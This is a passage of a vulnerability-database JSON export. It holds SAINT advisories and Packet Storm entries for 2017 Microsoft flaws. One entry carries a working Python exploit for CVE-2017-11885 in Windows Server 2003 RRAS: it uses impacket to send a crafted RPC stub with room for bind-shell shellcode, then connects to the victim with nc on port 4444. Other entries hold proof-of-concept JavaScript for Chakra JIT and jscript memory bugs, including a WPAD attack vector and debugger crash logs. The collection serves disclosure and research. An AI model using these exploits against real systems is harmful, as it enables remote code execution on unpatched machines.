"vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:31:55", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. \n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider disabling the RRAS service if you are still using Windows Server 2003, or apply a patch once Microsoft has issued one to fix it. \n\n### References\n\n[https://www.exploit-db.com/exploits/44616/](<https://www.exploit-db.com/exploits/44616/>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>) \n[http://www.securityfocus.com/bid/102055](<http://www.securityfocus.com/bid/102055>) \n[http://www.securitytracker.com/id/1039987](<http://www.securitytracker.com/id/1039987>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. 
\n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:C4674FB138FD60F9330A06268CB37D2D", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:31", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. 
\n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider disabling the RRAS service if you are still using Windows Server 2003, or apply a patch once Microsoft has issued one to fix it. \n\n### References\n\n[https://www.exploit-db.com/exploits/44616/](<https://www.exploit-db.com/exploits/44616/>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>) \n[http://www.securityfocus.com/bid/102055](<http://www.securityfocus.com/bid/102055>) \n[http://www.securitytracker.com/id/1039987](<http://www.securitytracker.com/id/1039987>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. 
\n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:05B17BC33184A044F91ECA8B2568248B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-05-14T01:10:49", "description": "", "cvss3": {}, "published": "2018-05-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows 2003 SP2 RRAS SMB Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2018-05-13T00:00:00", "id": "PACKETSTORM:147593", "href": "https://packetstormsecurity.com/files/147593/Microsoft-Windows-2003-SP2-RRAS-SMB-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS 
service is enabled. \n \n#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure. \n#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution. \n#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using \n#Windows Server 2003. \n \n#Exploit created by: VActor Portal \n#For learning purpose only \n \nimport struct \nimport sys \nimport time \nimport os \n \nfrom threading import Thread \n \nfrom impacket import smb \nfrom impacket import uuid \nfrom impacket import dcerpc \nfrom impacket.dcerpc.v5 import transport \n \ntarget = sys.argv[1] \n \nprint '[-]Initiating connection' \ntrans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % target) \ntrans.connect() \n \nprint '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % target \ndce = trans.DCERPC_class(trans) \n \n#RRAS DCE-RPC endpoint \ndce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0'))) \n \n#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b \"\\x00\" -f python \nbuf = \"\" \n \n#NDR format \nstub = \"\\x21\\x00\\x00\\x00\" #dwPid = PID_IP (IPv4) \nstub += \"\\x10\\x27\\x00\\x00\" #dwRoutingPID \nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibInEntrySize \nstub += \"\\x41\"*4 #_MIB_OPAQUE_QUERY pointer \nstub += \"\\x04\\x00\\x00\\x00\" #dwVarID (_MIB_OPAQUE_QUERY) \nstub += \"\\x41\"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY) \nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibOutEntrySize \nstub += \"\\xad\\x0b\\x2d\\x06\" #dwVarID ECX (CALL off_64389048[ECX*4]) 
-> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY) \nstub += \"\\xd0\\xba\\x61\\x41\\x41\" + \"\\x90\"*5 + buf + \"\\x41\"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY) \nstub += \"\\x04\\x00\\x00\\x00\" #dwId (_MIB_OPAQUE_INFO) \nstub += \"\\x41\"*4 #ullAlign (_MIB_OPAQUE_INFO) \n \n \ndce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected) \nprint \"[-]Exploit sent to target successfully...\" \n \nprint \"Waiting for shell...\" \ntime.sleep(5) \nos.system(\"nc \" + target + \" 4444\") \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147593/mswin2003sp2rras-exec.txt", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT Escape Analysis Bug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145787", "href": "https://packetstormsecurity.com/files/145787/Microsoft-Edge-Chakra-JIT-Escape-Analysis-Bug.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Escape analysis bug \n \nCVE-2017-11918 \n \n \nEscape analysis: https://en.wikipedia.org/wiki/Escape_analysis \n \nChakra fails to detect if \"tmp\" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values. \n \nPoC: \nfunction opt() { \nlet tmp = []; \ntmp[0] = tmp; \nreturn tmp[0]; \n} \n \nfunction main() { \nfor (let i = 0; i < 0x1000; i++) { \nopt(); \n} \n \nprint(opt()); // deref uninitialized stack pointers! \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145787/GS20180110005019.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT Op_MaxInAnArray / Op_MinInAnArray Misuse", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145781", "href": "https://packetstormsecurity.com/files/145781/Microsoft-Edge-Chakra-JIT-Op_MaxInAnArray-Op_MinInAnArray-Misuse.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Op_MaxInAnArray and Op_MinInAnArray can explicitly call user defined JavaScript functions \n \nCVE-2017-11893 \n \n \n1. Call patterns like \"Math.max.apply(Math, [1, 2, 3, 4, 5])\" and \"Math.max.apply(Math, arr)\" can be optimized to directly call the method \"JavascriptMath::MaxInAnArray\" in the Inline Phase. \n2. The method takes the original method \"Math.max\" as the first parameter and the arguments object as the second parameter. \n3. If the arguments object can't be handled by the method, it explicitly calls the original method \"Math.max\". \n4. But it doesn't check if the property \"Math.max\" has changed, so a user defined JavaScript function can be called without updating \"ImplicitCallFlags\". \n \nNote: Math.min as well. \n \nPoC: \nfunction opt(arr, arr2) { \narr[0] = 1.1; \nMath.max.apply(Math, arr2); \narr[0] = 2.3023e-320; \n} \n \nfunction main() { \nlet arr = [1.1, 2.2, 3.3, 4.4]; \nfor (let i = 0; i < 10000; i++) { \nopt(arr, [1, 2, 3, 4]); \n} \n \nMath.max = function () { \narr[0] = {}; \n}; \n \nopt(arr, {}); // can't handle, calls Math.max \nprint(arr[0]); \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145781/GS20180110003945.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-19T15:33:35", "description": "", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "packetstorm", "title": "Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-19T00:00:00", "id": "PACKETSTORM:145483", "href": "https://packetstormsecurity.com/files/145483/Microsoft-Windows-jscript-RegExpFncObj-LastParen-Out-Of-Bounds-Read.html", "sourceData": "`Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen \n \nCVE-2017-11906 \n \n \nThere is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places): \n \nPoC for IE (note: page heap might be required to observe the crash): \n \n========================================= \n \n<!-- saved from url=(0014)about:internet --> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta> \n<script language=\"Jscript.Encode\"> \n \nfunction go() { \nvar r= new RegExp(Array(100).join('()')); \n''.search(r); \nalert(RegExp.lastParen); \n} \n \ngo(); \n \n</script> \n \n========================================= \n \nDebug log: \n \n========================================= \n \n(cec.a14): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \njscript!RegExpFncObj::LastParen+0x43: \n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 
\n \n0:014> r \nrax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 \nrdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 \nrip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 \nr8=00000000130f9210 r9=0000000000000000 r10=000000000463fef0 \nr11=000000000463ff38 r12=0000000000000083 r13=0000000000000000 \nr14=00000000130f9210 r15=0000000000000000 \niopl=0 nv up ei pl nz na po nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \njscript!RegExpFncObj::LastParen+0x43: \n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 
\n \n0:014> k \n# Child-SP RetAddr Call Site \n00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43 \n01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5 \n02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873 \n03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373 \n04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3 \n06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea \n07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6 \n08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7 \n0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e \n0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a \n0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 \n0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56 \n0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 \n0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f \n10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 \n11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283 \n12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 \n13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 \n14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 \n15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb \n16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f \n17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70 \n18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1 \n19 
00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 \n1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 \n1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 \n1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150 \n1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad \n1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5 \n1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 \n20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 \n21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f \n22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f \n23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd \n24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d \n \n========================================= \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145483/GS20171219055214.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT BackwardPass::RemoveEmptyLoopAfterMemOp Failed Insert", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145782", "href": "https://packetstormsecurity.com/files/145782/Microsoft-Edge-Chakra-JIT-BackwardPass-RemoveEmptyLoopAfterMemOp-Failed-Insert.html", "sourceData": "`Microsoft Edge: Chakra: JIT: BackwardPass::RemoveEmptyLoopAfterMemOp doesn't insert branches. 
\n \nCVE-2017-11909 \n \n \nThe optimizations for memory operations may leave empty loops as follows: \n \nfor (let i = 0; i < arr.length; i++) { \narr[i] = 0; \n} \n \nBecomes: \n \nMemset(arr, 0, arr.length); \nfor (let i = 0; i < arr.length; i++) { \n// empty! \n} \n \nThese empty loops will be removed by \"BackwardPass::RemoveEmptyLoopAfterMemOp\". But this method just removes them without considering branches. \n \nHere's what may happen. \n \nA: \nMemset(arr, 0, arr.length); \n \nfor (let i = 0; i < arr.length; i++) { \n \n} \ngoto D; // Actually, this's a \"BrGe_I4\" instruction in the PoC. \n \nC: \n... \n \nD: \n... \n \nBecomes: \n \nA: \nMemset(arr, 0, arr.length); \n \nC: \n... \n \nD: \n... \n \nSo, this may break the control flow. \n \n \nPoC: \nfunction opt(a, b, always_true = true) { \na[0] = 1234; \nb[0] = 0; \n \nlet arr = a; \nif (always_true) { \narr = b; \nfor (let i = 0; i < arr.length; i++) \narr[i] = 0; \n} \n \nlet val = arr[0]; \nif (val) { \nprint(val); // Must be 0, but prints out 1234 \nreturn true; \n} \n \nreturn false; \n} \n \nlet a = new Uint32Array(1); \nlet b = new Uint32Array(0x1000); \nfor (let i = 0; i < 10000; i++) { \nif (opt(a, b)) { \nbreak; \n} \n} \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145782/GS20180110004153.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT asm.js Out-Of-Bounds Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145783", "href": "https://packetstormsecurity.com/files/145783/Microsoft-Edge-Chakra-JIT-asm.js-Out-Of-Bounds-Read.html", "sourceData": "`Microsoft Edge: Chakra: OOB read in asm.js \n \nCVE-2017-11911 \n \n \nHere's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody. \nAsmJsVar * initSource = nullptr; \nif (decl->sxVar.pnodeInit->nop == knopName) \n{ \nAsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction); \nif (initSym->GetSymbolType() == AsmJsSymbol::Variable) \n{ \n// in this case we are initializing with value of a constant var \ninitSource = initSym->Cast<AsmJsVar>(); \n} \n... \n} \n... \nif (initSource) \n{ \nif (var->GetType().isDouble()) \n{ \nmWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser())); \n} \n \nChakra thinks the PoC is valid asm.js code. What happens when the variable \"b\" gets initialized is: \n1. mCompiler->LookupIdentifier is called with \"a\" as the first argument. And it returns the local variable \"a\", which is of type int, but not the double constant \"a\". \n2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read. 
\n \nPoC: \nfunction createModule() { \n'use asm'; \nconst a = 1.0; \nfunction f() { \nvar b = a; \nvar a = 0; \n} \n \nreturn f; \n} \nvar f = createModule(); \nf(); \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145783/GS20180110004307.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T08:21:19", "description": "", "cvss3": {}, "published": "2018-01-17T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JavascriptGeneratorFunction::GetPropertyBuiltIns Exposure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2018-01-17T00:00:00", "id": "PACKETSTORM:145950", "href": "https://packetstormsecurity.com/files/145950/Microsoft-Edge-Chakra-JavascriptGeneratorFunction-GetPropertyBuiltIns-Exposure.html", "sourceData": "`Microsoft Edge: Chakra: JavascriptGeneratorFunction::GetPropertyBuiltIns exposes scriptFunction \n \nCVE-2017-11914 \n \n \nHere's a snippet of the method. \nbool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result) \n{ \nif (propertyId == PropertyIds::length) \n{ \n... \nint len = 0; \nVar varLength; \nif (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext)) \n{ \nlen = JavascriptConversion::ToInt32(varLength, requestContext); \n} \n... \nreturn true; \n} \n \nreturn false; \n} \n \n\"JavascriptGeneratorFunction\" is like a wrapper class used to ensure the arguments for \"scriptFunction\". So \"scriptFunction\" must not be exposed to user JavaScript code. 
But the vulnerable method exposes \"scriptFunction\" as \"this\" when getting the \"length\" property. \n \nThe code should be like: \"scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);\" \n \nType confusion PoC: \nfunction* f() { \n} \n \nlet g; \nf.__defineGetter__('length', function () { \ng = this; // g == \"scriptFunction\" \n}); \n \n \nf.length; \n \ng.call(0x1234, 0x5678); // type confusion \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145950/GS20180118040348.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-19T15:33:34", "description": "", "cvss3": {}, "published": "2017-12-18T00:00:00", "type": "packetstorm", "title": "Microsoft Windows jscript!RegExpComp::Compile Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-18T00:00:00", "id": "PACKETSTORM:145479", "href": "https://packetstormsecurity.com/files/145479/Microsoft-Windows-jscript-RegExpComp-Compile-Heap-Overflow.html", "sourceData": "`Windows: Heap overflow in jscript!RegExpComp::Compile through IE or local network via WPAD \n \nCVE-2017-11890 \n \n \nThere is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors: \n \n- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. 
Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service. \n \n- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode. \n \nThe issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied. \n \nPoC for Internet Explorer: \n \n============================================ \n \n<!-- saved from url=(0014)about:internet --> \n<html> \n<head> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta> \n</head> \n<body> \n<script language=\"Jscript.Encode\"> \n \nvar s = 'a'; \nfor(var i=0;i<28;i++) { \ns = s+s; \n} \ns = s+'[a-z]'+s; \n \nr = new RegExp(); \nr.compile(s); \n \n</script> \n</body> \n</html> \n \n============================================ \n \nPoC for WPAD: \n \n============================================ \n \nfunction FindProxyForURL(url, host) { \n \nvar s = 'a'; \nfor(var i=0;i<28;i++) { \ns = s+s; \n} \ns = s+'[a-z]'+s; \n \nr = new RegExp(); \nr.compile(s); \n \nreturn \"DIRECT\"; \n} \n \n=========================================== \n \nTechnical details: \n \nThe issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. 
Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like: \n \nvoid RegExpBase::EnsureSpace(int desired_size) { \nif(desired_size > buffer_size) { \nif(2 * desired_size < desired_size) { \n//throw an exception \n} \nint new_size = 2 * desired_size; \nchar * new_buffer = realloc(buffer, new_size); \nif(!new_buffer) { \n//throw an exception \n} \nbuffer = new_buffer; \nbuffer_size = new_size; \n} \n} \n \nNote that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer. \n \nIndeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process. \n \nDebug log (from IE, but it looks similar in the WPAD service): \n \n============================================ \n \n(b90.698): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \nmsvcrt!memcpy+0x1d9: \n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=???? 
\n \n0:012> r \nrax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0 \nrdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a \nrip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28 \nr8=0000000040000008 r9=0000000000000000 r10=6100610061006100 \nr11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670 \nr14=0000000020000001 r15=0000000000000000 \niopl=0 nv up ei pl nz na pe nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 \nmsvcrt!memcpy+0x1d9: \n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=???? 
